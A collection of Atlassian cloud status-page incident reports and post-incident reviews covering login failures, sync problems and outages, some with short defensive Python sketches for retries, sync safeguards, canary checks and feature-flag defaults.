Report: "Atlassian Access license subscription/resubscription not working properly"
Last update: Between 20/Apr/23 12:00 AM UTC and 28/Apr/23 6:00 PM UTC, we experienced a failure with the product subscription activation and reactivation functionality for Atlassian Access. The issue has been resolved and the service is operating normally.
We're still working on the issue with licensing subscription/resubscription that is impacting some Atlassian Access Cloud customers. As mentioned, we have identified the root cause and applied the fix for some affected customers.
We continue to work on resolving the issue with licensing subscription/resubscription that is impacting some Atlassian Access Cloud customers. We have identified the root cause and applied the fix for some affected customers. We expect recovery shortly.
We are investigating an issue with licensing subscription activation and reactivation that is impacting some Atlassian Access Cloud customers. We will provide more details within the next hour.
Report: "Issues in new product activations, user management and user imports"
Last update: Between 09:00 UTC and 18:00 UTC, we experienced an issue with user management and user imports for Confluence, Jira, Jira Service Management, Jira Work Management, and Jira Product Discovery. The issue has been resolved and the service is operating normally.
We are seeing some recurrence of the issue and have taken mitigation actions. We are closely monitoring the issue while those actions take effect.
We have identified the root cause of the product activation and user management issues. The problem has now been mitigated. We are now monitoring closely.
We are investigating an issue with our servers that is impacting some of our customers' ability to perform:

* New product activations
* User imports
* User management

We will provide more details within the next hour.
Report: "Intermittent errors during login for some customers"
Last update: Between 07:31 UTC and 12:32 UTC, we experienced errors during login for Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Product Discovery, Compass, and Atlassian Analytics. The issue has been resolved and the service is operating normally.
We have identified the root cause of the errors during login and have mitigated the problem. We are now monitoring closely.
We are investigating reports of errors during login that are impacting some Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Product Discovery, Compass, and Atlassian Analytics customers. We have identified the root cause and expect recovery shortly.
We are investigating reports of errors during login that are impacting some Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Product Discovery, and Atlassian Analytics Cloud customers. We will provide more details within the next hour.
We are investigating reports of errors during login that are impacting some Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Product Discovery, and Atlassian Analytics Cloud customers. We will provide more details within the next hour.
We are investigating reports of intermittent errors during login for some Confluence, Jira Work Management, Jira Service Management, Jira Software, Trello, Atlassian Bitbucket, Atlassian Access, and Jira Product Discovery Cloud customers. We will provide more details once we identify the root cause.
Report: "Performance issues and outages with Cloud products"
Last update:

### **SUMMARY**

We understand the importance of providing reliable and consistent service to our valued customers. On July 6, 2023, from 03:52 to 15:11 UTC, we experienced an issue with an upgraded version of a third-party tool that functions as our internal artifact management system. Despite our monitoring system identifying the incident within two minutes, this issue led to the degradation of the scaling capabilities of our internal hosting platform, resulting in service degradation or outages for customers of Atlassian cloud. In response to this situation, we are taking immediate measures to enhance the stability of our system and prevent similar issues from re-occurring.

### **IMPACT**

This incident affected multiple regions and products due to the diminished scaling capabilities of our internal hosting platform. In most products and offerings, customers faced reduced functionality, slower response times, and limited access to specific features.

### **ROOT CAUSE**

The root cause of the incident was the introduction of new functionality in a third-party tool that functions as our internal artifact management system. It led to an unexpected increase in the load on the primary database of the artifact system. Upon identifying and localizing the problem, we promptly adjusted the system configuration to regain stability.

### **REMEDIAL ACTIONS PLAN & NEXT STEPS**

Over the next months, we will enact a temporary freeze on non-critical upgrades of the artifact management system, and we will focus our efforts on three high-priority initiatives:

1. **Enhancing system scaling:** We prioritized work ensuring that downtime in a critical infrastructure component does not affect the scaling of other components. We expect to complete this initiative within the next two months.
2. **Reducing interdependencies:** We are working to mitigate the risk of potential cascading failures by ensuring that significant system components are able to operate independently in the case of issues. Initiatives 1 and 2 are already in progress but have been given priority to be completed as soon as possible.
3. **Strengthening testing procedures:** Alongside these initiatives, we are addressing the need for even more stringent testing procedures than we already have in place to prevent potential issues in future updates.

We are committed to collaborating closely with our technology partners to ensure the most optimal experience for our customers. We apologize for any inconvenience caused by this incident and appreciate your understanding. Our team is dedicated to continually improving our systems and processes to provide you with the exceptional service you deserve. Thank you for your continued support and trust in us.

Sincerely,

Atlassian Customer Support
We experienced performance issues and outages for several Atlassian Cloud Products. The issue has been resolved and the service is operating normally.
We have identified the root cause of an issue with an internal infrastructure component that has been impacting multiple Cloud products, including Jira Software, Jira Service Management, and Confluence, and their customers. This issue led to a performance impact and, in some cases, outages. We have implemented a fix to resolve the issue and recovery is in progress.
We are investigating an issue with an internal infrastructure component that is impacting multiple Cloud products, including Jira Software, Bitbucket, Jira Service Management, and Confluence, and their customers. These issues include performance impact and, in some cases, outages. Users may experience slow loading and uploading of attachments, login issues, or the inability for new customers to sign up. We have identified the root cause and are actively working on service recovery.
Report: "Sign-ups, Product Activation, and Billing not working"
Last update: We mitigated the issue with Sign-ups, Product Activation, and Billing; the systems are back to business as usual and all functionality is restored.
We have identified the root cause of the Sign-ups, Product Activation, and Billing not working and have mitigated the problem. We are now monitoring closely.
We are investigating an issue with Sign-ups, Product Activation, and Billing that is impacting all of our Cloud Customers. We will provide more details within the next hour.
Report: "Reports of Lost Permissions for Google-Synced Groups"
Last update: We have not observed the issue in our internal logs for the past 2 hours. We don't have an official confirmation from Google, but based on our observations we are now considering this issue resolved.
We are still waiting for an ETA from Google to permanently resolve the issue. In the meantime, we will be proactively disabling Google sync and restoring the missing permissions for synced groups on all affected sites.
We continue to work on resolving the loss of permissions for synced groups from Google Workspace. We have identified the root cause and expect recovery shortly.
We are investigating intermittent reports of Google Workspace synced groups being removed and re-added without the proper permissions for their Cloud Products. We will provide more details once we identify the root cause.
Report: "Google Workspace integration causing group deletion from Atlassian"
Last updateGoogle has pushed updates to their Admin API that should resolve the bad state in group provisioning scopes. Any paused sync can now be resumed to restore functionality.
We have identified the root cause of the group deletions and have mitigated the problem. We are now monitoring closely. If you believe the issue has not been resolved for you, please don't hesitate to get in touch with Atlassian Support at https://support.atlassian.com/contact/
We are still investigating the recurring issue where Google Workspace is intermittently deleting groups from Atlassian Sites. This incident impacts permissions and access to products. Our team is actively engaged in determining the cause of these erroneous deletions by the Google Workspace integration and is working on a solution to prevent any future occurrences. If this situation has affected you and you require a fix, please don't hesitate to get in touch with Atlassian Support at https://support.atlassian.com/contact/
We identified a recurrence of Google Workspace sporadically removing groups from instances. This affects permissions and access to product instances. Our team is working to restore the settings incorrectly deleted by the Google Workspace integration and to prevent further occurrences. If you are affected and need restoration, contact Atlassian Support.
Updating affected components
Confluence and Jira customers should no longer face any issues in accessing their Atlassian Sites. We are actively investigating the root cause of the problem to provide a permanent fix.
Update: highlighting affected components
We're addressing an issue causing sporadic removal of Google Workspace synced groups from Cloud sites. This is affecting permissions and access to projects. Our team is working to restore settings and prevent further occurrences. This is a recurrence of the issue reported on August 10, 2023. We apologize for any inconvenience.
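One common safeguard against the failure mode in this report, sketched here in Python, is to refuse to apply an implausibly large wave of deletions coming from an upstream directory. This is a generic illustration rather than Atlassian's sync logic; the 10% threshold and the set-based reconciliation are assumptions.

```python
def reconcile_groups(upstream_groups, local_groups, max_delete_fraction=0.1):
    """Compute adds/removes for a directory sync, refusing to apply a
    suspiciously large wave of deletions (for example, when an upstream
    API is in a bad state and reports existing groups as missing)."""
    to_add = upstream_groups - local_groups
    to_remove = local_groups - upstream_groups
    if local_groups and len(to_remove) / len(local_groups) > max_delete_fraction:
        # Pause the sync for manual review rather than mass-deleting groups.
        raise RuntimeError("deletion threshold exceeded; sync paused")
    return to_add, to_remove
```

With the defaults above, a sync that tried to drop half of a site's groups would be paused for review instead of applied.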
Report: "Atlassian services unable to scale"
Last updateWe have resolved a case of degraded performance for Confluence, Jira Work Management, Jira Service Management, Jira Software, Atlassian Bitbucket, Atlassian Access, Jira Align, Jira Product Discovery, Atlas, and Compass Cloud customers. We will provide more details within the next hour.
Report: "SP Entity URL and SP ACS URL not visible on the SAML SSO setup workflow"
Last updateThis incident has been resolved. The Service Provider entity URL and the Service Provider Assertion Consumer Service (ACS) URL are now displayed correctly.
A fix has been implemented and we are monitoring the results.
We have identified an issue where the Service Provider entity URL and the Service Provider Assertion Consumer Service URL are not visible in the SAML SSO configuration wizard. We have found the root cause and are working on a fix.
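For context on the two values the wizard failed to display: in SAML 2.0 metadata, the SP entity URL is the `entityID` attribute of the `EntityDescriptor`, and the ACS URL is the `Location` of the `AssertionConsumerService` element. Below is a minimal Python sketch that extracts both from SP metadata XML; it uses the standard SAML metadata namespace and is not Atlassian-specific code.

```python
import xml.etree.ElementTree as ET

MD = "urn:oasis:names:tc:SAML:2.0:metadata"  # standard SAML 2.0 metadata namespace

def sp_details(metadata_xml):
    """Extract the SP entity ID and the ACS URL from SP metadata XML,
    i.e. the two values the setup wizard failed to display."""
    root = ET.fromstring(metadata_xml)
    entity_id = root.get("entityID")
    acs = root.find(f"{{{MD}}}SPSSODescriptor/{{{MD}}}AssertionConsumerService")
    return entity_id, acs.get("Location") if acs is not None else None
```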
Report: "Atlassian Account login issues"
Last update### **SUMMARY** On Sep 13, 2023, between 12:00 PM UTC and 03:30 PM UTC, some Atlassian users were unable to sign in to their accounts and use multiple Atlassian cloud products. The event was triggered by a misconfiguration of rate limits in an internal service, which caused a cascading failure in sign-in and signup-related APIs. The incident was quickly detected by multiple automated monitoring systems. It was mitigated on Sep 13, 2023, at 03:30 PM UTC by the rollback of a feature and additional scaling of services, which put Atlassian systems into a known good state. The total time to resolution was about 3 hours and 30 minutes. ### **IMPACT** The overall impact was between Sep 13, 2023, 12:00 PM UTC and Sep 13, 2023, 03:30 PM UTC on multiple products. The incident caused intermittent service disruption across all regions. Some users were unable to sign in. Other scenarios that temporarily failed were new user signups, profile retrieval, and password reset. At the peak of the incident, 90% of requests were failing across authentication, user profile retrieval, and password reset use cases. ### **ROOT CAUSE** The issue was caused by a misconfiguration of a rate limit in an internal core service. As a result, some sign-in requests over the limit received HTTP 429 errors. Client retry behavior then multiplied the load, which led to further service degradation. Because many internal services depend on each other, the complexity of the call graph lengthened the time needed to identify the actual faulty service. ### **REMEDIAL ACTIONS PLAN & NEXT STEPS** We are continuously improving our system's resiliency. We are prioritizing the following improvement actions to avoid repeating this type of incident: * Audit and improve service rate limits and client retry and backoff behavior. * Improve scale and load test automation for complex service interactions. * Audit cross-service dependencies related to sign-in flows and minimize them where possible. Because sign-in was unavailable, some customers were unable to create support tickets. We are making additional process improvements to: * Enable our unauthenticated support contact form and notify users that it should be used when standard channels are not available. * Create status page notifications more quickly and ensure that for severe incidents, notifications to all subscribers are enabled. We apologize to users who were impacted during this incident; we are taking immediate steps to improve the platform’s reliability and availability. Thanks, Atlassian Customer Support
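The first remedial item above (auditing client retry and backoff behavior) targets the retry amplification named in the root cause. Here is a minimal sketch of the usual countermeasure, capped exponential backoff with full jitter that also honors a `Retry-After` header; the function names and parameters are illustrative, not Atlassian's client code.

```python
import random
import time

def call_with_backoff(request_fn, max_attempts=5, base_delay=0.5, max_delay=30.0):
    """Retry a rate-limited request with capped exponential backoff and
    full jitter, so retries spread out instead of multiplying load."""
    for attempt in range(max_attempts):
        response = request_fn()
        if response.status_code != 429:
            return response
        # Honor the server's Retry-After hint when present (assumed to be
        # expressed in seconds here); otherwise back off with jitter.
        retry_after = response.headers.get("Retry-After")
        if retry_after is not None:
            delay = float(retry_after)
        else:
            delay = random.uniform(0, min(max_delay, base_delay * 2 ** attempt))
        time.sleep(delay)
    return response  # still rate-limited after max_attempts; caller decides
```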
Between 12:45 UTC and 15:30 UTC, we experienced login and signup issues for Atlassian Accounts. The issue has been resolved and the service is operating normally. We will publish a post-incident review with the details of the incident and the actions we are taking to prevent similar problems in the future.
We are no longer seeing occurrences of the Atlassian Accounts login errors; all customers should now be able to log in successfully. We will continue to monitor.
We can see a reduction in the Atlassian Accounts login issues after the mitigation actions were taken. We are still monitoring closely and will continue to provide updates.
We have identified the root cause of the Atlassian Accounts login issues impacting Cloud Customers and have mitigated the problem. We are now monitoring this closely.
We are investigating an issue with Atlassian Accounts login that is impacting some Cloud customers. We will provide more details within the next hour.
Report: "Degraded performance in Cloud"
Last updateThe issues with Access have been mitigated, and the incident is now marked as resolved for Access.
An outage with a cloud provider is impacting multiple Atlassian Cloud products including Access, Confluence, Trello, and Jira Products. We will provide more details within the next hour.
Report: "Degraded performance in Cloud"
Last updateBetween 09/18 10:47 UTC and 09/19 04:15 UTC, we experienced degraded performance for some Confluence, Jira Work Management, Jira Service Management, Jira Software, Trello, Atlassian Access, and Jira Product Discovery customers. The issue has been resolved and the service is operating normally.
Services are confirmed to be stable. We are performing final validation checks before confirming the incident's resolution.
We have identified the root cause of the degraded performance and have mitigated the problem. We are monitoring this closely.
We are investigating cases of degraded performance for some Atlassian Access Cloud customers. We will provide more details within the next hour.
Report: "Email domain unverified"
Last updateBetween 22:00 UTC 23rd October and 07:45 UTC 24th October, we experienced an issue with custom domain validation. This resulted in Atlassian Access notification emails for some customers being sent from generic Atlassian email domains rather than the custom domain email address. The issue has been resolved and the service is operating normally.
We have identified the issue and a fix is currently being implemented. We expect this issue to be resolved shortly.
We identified that the mitigation method doesn't fix the issue in some affected Cloud instances. We are continuing with the investigation.
We have mitigated the problem. We are now monitoring this closely. Please contact us at https://support.atlassian.com/contact/ if you are still facing issues with email domain verification.
We continue to work on resolving the issue with domain verification. We have identified the root cause and expect recovery shortly.
The investigation is still ongoing. We are working on a mitigation.
We are continuing to investigate this issue. We are aware that this incident is impacting custom email configuration and some Jira notifications are being sent with the default email address instead of the configured custom email. We will provide more details in the next hour.
We are investigating an issue with emails that have been sent out to admins stating domain verification is failing. We will provide more details within the next hour.
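Custom email domain verification of this kind typically hinges on a DNS TXT record lookup. A minimal sketch using the third-party `dnspython` package follows; the token scheme is hypothetical and not Atlassian's actual verification mechanism.

```python
import dns.resolver  # third-party package: dnspython

def domain_is_verified(domain, expected_token):
    """Check whether a TXT record on `domain` contains the expected
    verification token. The token scheme is illustrative only."""
    try:
        answers = dns.resolver.resolve(domain, "TXT")
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return False
    return any(expected_token in b"".join(r.strings).decode() for r in answers)
```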
Report: "Egress connectivity timing out"
Last updateThe systems are stable after the fix and have been monitored for a specified duration.
The issue was identified and a fix implemented. We are currently monitoring.
We are currently investigating an incident that results in outbound connections from Atlassian cloud in us-east-1 intermittently timing out. This affects Jira, Trello, Confluence, and Ecosystem products. The affected features for these products are those that require opening a connection from Atlassian Cloud to public endpoints on the Internet.
Update: including Atlassian Developer.
We are currently investigating an incident that results in connection timeouts on the service egress proxy. This affects Jira, JSM, Confluence, Bitbucket, Trello, and Ecosystem products. The affected features for these products are those that require a connection through the service egress proxy.
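The features affected by this incident are those that open outbound connections through an egress proxy. A minimal sketch of such a call with explicit connect/read timeouts, so a hung proxy surfaces as a fast, retryable error rather than a stalled request; the proxy address is hypothetical.

```python
import requests

# Hypothetical egress proxy address; a real deployment would read this
# from configuration.
EGRESS_PROXY = {"https": "http://egress-proxy.internal:3128"}

def fetch_via_egress(url, connect_timeout=3.05, read_timeout=10):
    """Open an outbound connection through the egress proxy with explicit
    connect/read timeouts. A ConnectTimeout or ReadTimeout exception then
    signals egress trouble quickly instead of hanging the caller."""
    return requests.get(url, proxies=EGRESS_PROXY,
                        timeout=(connect_timeout, read_timeout))
```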
Report: "Delayed SCIM provisioning syncs of users and groups from Identity Providers"
Last updateWe experienced degraded SCIM provisioning from external Identity Providers for Confluence, Jira Work Management, Jira Service Management, Jira Software, and Atlassian Access. The issue has been resolved and the service is operating normally.
A fix for the bottleneck identified in the Group synchronization process for SCIM Provisioning has been made. We are seeing processing start to return to normal levels and will be monitoring over the next few hours. The team is all hands on deck to keep improving the situation.
The bottleneck in the Group synchronization process for SCIM Provisioning has seen considerable improvement due to recent changes, but it is still under work. The team is all hands on deck to keep improving the situation.
The bottleneck in the Group synchronization process for SCIM Provisioning is still under work. The team is all hands on deck to improve the situation.
The bottleneck in the Group synchronization process for SCIM Provisioning is still under work. We are closely monitoring the service.
We have identified a bottleneck in the Group synchronization process for SCIM Provisioning. We have increased the resources allocated to the process in order to mitigate the issue. We are now monitoring the service.
We are investigating cases of degraded performance when SCIM provisioning users/groups for Confluence, Jira Work Management, Jira Service Management, Jira Software, and Atlassian Access Cloud customers. We will provide more details shortly.
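The mitigation described above, allocating more resources to the group synchronization process, amounts to widening the worker pool that drains the sync backlog. A minimal sketch under that assumption; `sync_one` is a hypothetical per-group sync function, not Atlassian's SCIM implementation.

```python
from concurrent.futures import ThreadPoolExecutor

def drain_sync_backlog(groups, sync_one, workers=8):
    """Drain a backlog of group-sync tasks with a bounded worker pool.
    Raising `workers` is the rough equivalent of 'allocating more
    resources to the process' described in the updates above."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return list(pool.map(sync_one, groups))
```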
Report: "Service Disruptions Affecting Atlassian Products"
Last update### **SUMMARY** On February 14, 2024, between 20:05 UTC and 23:03 UTC, Atlassian customers on the following cloud products encountered a service disruption: Access, Atlas, Atlassian Analytics, Bitbucket, Compass, Confluence, Ecosystem apps, Jira Service Management, Jira Software, Jira Work Management, Jira Product Discovery, Opsgenie, Statuspage, and Trello. As part of a security and compliance uplift, we had scheduled the deletion of unused and legacy domain names used for internal service-to-service connections. Active domain names were incorrectly deleted during this event, impacting all cloud customers across all regions. The issue was identified and resolved through the rollback of the faulty deployment, restoring the domain names and returning Atlassian systems to a stable state. The time to resolution was two hours and 58 minutes. ### **IMPACT** External customers started reporting issues with Atlassian cloud products at 20:52 UTC. The failed change led to performance degradation or, in some cases, complete service disruption. Symptoms experienced by end-users were unsuccessful page loads and/or failed interactions with our cloud products. ### **ROOT CAUSE** As part of a security and compliance uplift, we had scheduled the deletion of unused and legacy domain names that were being used for internal service-to-service connections. Active domain names were incorrectly deleted during this operation. ### **REMEDIAL ACTIONS PLAN & NEXT STEPS** We know that outages impact your productivity. Detection was delayed because existing testing and monitoring focused on individual service health rather than the entire system's availability. To prevent a recurrence of this type of incident, we are implementing the following improvement measures: * Canary checks that monitor the entire system's availability. * Faster rollback procedures for this type of service impact. * Stricter change control procedures for infrastructure modifications. * Migration of all DNS records to centralized management, with stricter access controls on modifications to DNS records. We apologize to customers whose services were impacted during this incident; we are taking immediate steps to improve the platform's performance and availability. Thanks, Atlassian Customer Support
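The first remedial item above, canary checks for whole-system availability, differs from per-service health checks by exercising the full request path (DNS resolution, gateway, application backend). A minimal sketch follows; the endpoint and thresholds are assumptions, not Atlassian's monitoring code.

```python
import requests

# Hypothetical canary endpoint: it should exercise the full request path
# (DNS resolution, gateway, application backend), not a single service.
CANARY_URL = "https://example.atlassian.net/wiki/rest/api/space"

def canary_ok(timeout=5):
    """Return True only if an end-to-end request succeeds; DNS failures
    and timeouts count as whole-system unavailability."""
    try:
        return requests.get(CANARY_URL, timeout=timeout).status_code < 500
    except requests.RequestException:
        return False
```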
We experienced increased errors on Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Align, Jira Product Discovery, Atlas, Compass, and Atlassian Analytics. The issue has been resolved and the services are operating normally.
We have identified the root cause of the Service Disruptions affecting all Atlassian products and have mitigated the problem. We are now monitoring this closely.
We have identified the root cause of the increased errors and have mitigated the problem. We continue to work on resolving the issue and monitoring this closely.
We are investigating reports of intermittent errors for all Cloud Customers across all Atlassian products. We will provide more details once we identify the root cause.
Report: "Audit logs fetching was failing"
Last updateBetween 20:24 UTC and 20:55 UTC, we experienced an outage in audit logs for Atlassian Access. The issue has been resolved and the service is operating normally.
Audit logs were down between 12:24 PM and 12:55 PM PST. There was no data loss. The issue has been mitigated, but we are still monitoring the service.
Report: "Investigating new product purchasing"
Last updateBetween 28th Feb 2024 23:15 UTC and 29th Feb 2024 00:05 UTC, we experienced an issue with new product purchasing for all products. All new sign-up products have been successfully provisioned, the issue is confirmed resolved, and the service is operating normally.
We are investigating an issue with new product purchasing that is impacting all products. Customers adding new cloud products may have experienced a long waiting page or an error page after attempting to add a product. We have mitigated the root cause and are working to resolve the impact for customers who attempted to add a product during the impact period. We will provide more details within the next hour.
Report: "Admin Portal Feature Access Issue"
Last updateBetween 6:30 AM UTC and 9:50 AM UTC, we experienced failures in accessing some features from the Admin Portal. The issue has been resolved and the service is operating normally.
We are investigating an issue causing failures in accessing some features from the Admin Portal, which is impacting some of our Cloud customers. We have identified the root cause and anticipate recovery shortly.
Report: "Delayed SCIM group sync"
Last updateThe issue has been resolved. All groups are in sync and the system is healthy. The incident is closed.
We continue to work on resolving the delayed SCIM group sync from the provisioning directory to individual Cloud sites. We have mitigated the root cause and are seeing recovery of sync tasks.
We are investigating delayed SCIM group sync from the provisioning directory to individual Cloud sites.
Report: "Error responses across multiple Cloud products"
Last update### **SUMMARY** On June 3rd, between 09:43 PM and 10:58 PM UTC, Atlassian customers using multiple products were unable to access their services. The event was triggered by a change to the infrastructure API Gateway, which is responsible for routing traffic to the correct application backends. The incident was detected by the automated monitoring system within five minutes and mitigated by correcting a faulty release feature flag, which put Atlassian systems into a known good state. The first communications were published on the Statuspage at 11:11 PM UTC. The total time to resolution was about 75 minutes. ### **IMPACT** The overall impact was between 09:43 PM and 10:17 PM UTC with the system in a degraded state, followed by a total outage between 10:17 PM and 10:58 PM UTC. _The incident caused service disruption to customers in all regions and affected the following products:_ * Jira Software * Jira Service Management * Jira Work Management * Jira Product Discovery * Jira Align * Confluence * Trello * Bitbucket * Opsgenie * Compass ### **ROOT CAUSE** A policy used in the infrastructure API Gateway was being updated in production via a feature flag. The combination of an erroneous value entered in the feature flag and a bug in the code resulted in the API Gateway not processing any traffic. This created a total outage in which all users received 5XX errors for most Atlassian products. Once the problem was identified and the feature flag updated to the correct values, all services began recovering immediately. ### **REMEDIAL ACTIONS PLAN & NEXT STEPS** We know that outages impact your productivity. While we have several testing and preventative processes in place, this specific issue wasn't identified because the change did not go through our regular release process and was instead applied through a feature flag. We are prioritizing the following improvement actions to avoid repeating this type of incident: * Prevent high-risk feature flags from being used in production * Improve testing of policy changes * Enforce longer soak times for policy changes * Roll out all feature flags progressively to minimize broad impact * Review the infrastructure feature flags to ensure they all have appropriate defaults * Improve our processes and internal tooling to provide faster communications to our customers We apologize to customers whose services were affected by this incident and are taking immediate steps to address the above gaps. Thanks, Atlassian Customer Support
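Two of the remedial items above, appropriate defaults and validation for infrastructure feature flags, can be illustrated with a defensive flag read that falls back to a known-good value when the configured one fails validation. A minimal sketch; the flag name and values are hypothetical.

```python
def read_flag(flags, name, default, valid=lambda value: True):
    """Read a feature flag defensively: fall back to a known-good default
    when the flag is missing or its value fails validation, instead of
    letting a bad value stop traffic processing."""
    value = flags.get(name, default)
    return value if valid(value) else default

# Example: a routing-policy flag (hypothetical) constrained to a known set.
policy = read_flag({"routing_policy": "v3"}, "routing_policy",
                   default="v1", valid=lambda v: v in {"v1", "v2"})
assert policy == "v1"  # the invalid "v3" falls back to the safe default
```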
Between 22:18 UTC and 22:56 UTC, we experienced errors for multiple Cloud products. The issue has been resolved and the service is operating normally.
We are investigating an issue with error responses for some Cloud customers across multiple products. We have identified the root cause and expect recovery shortly.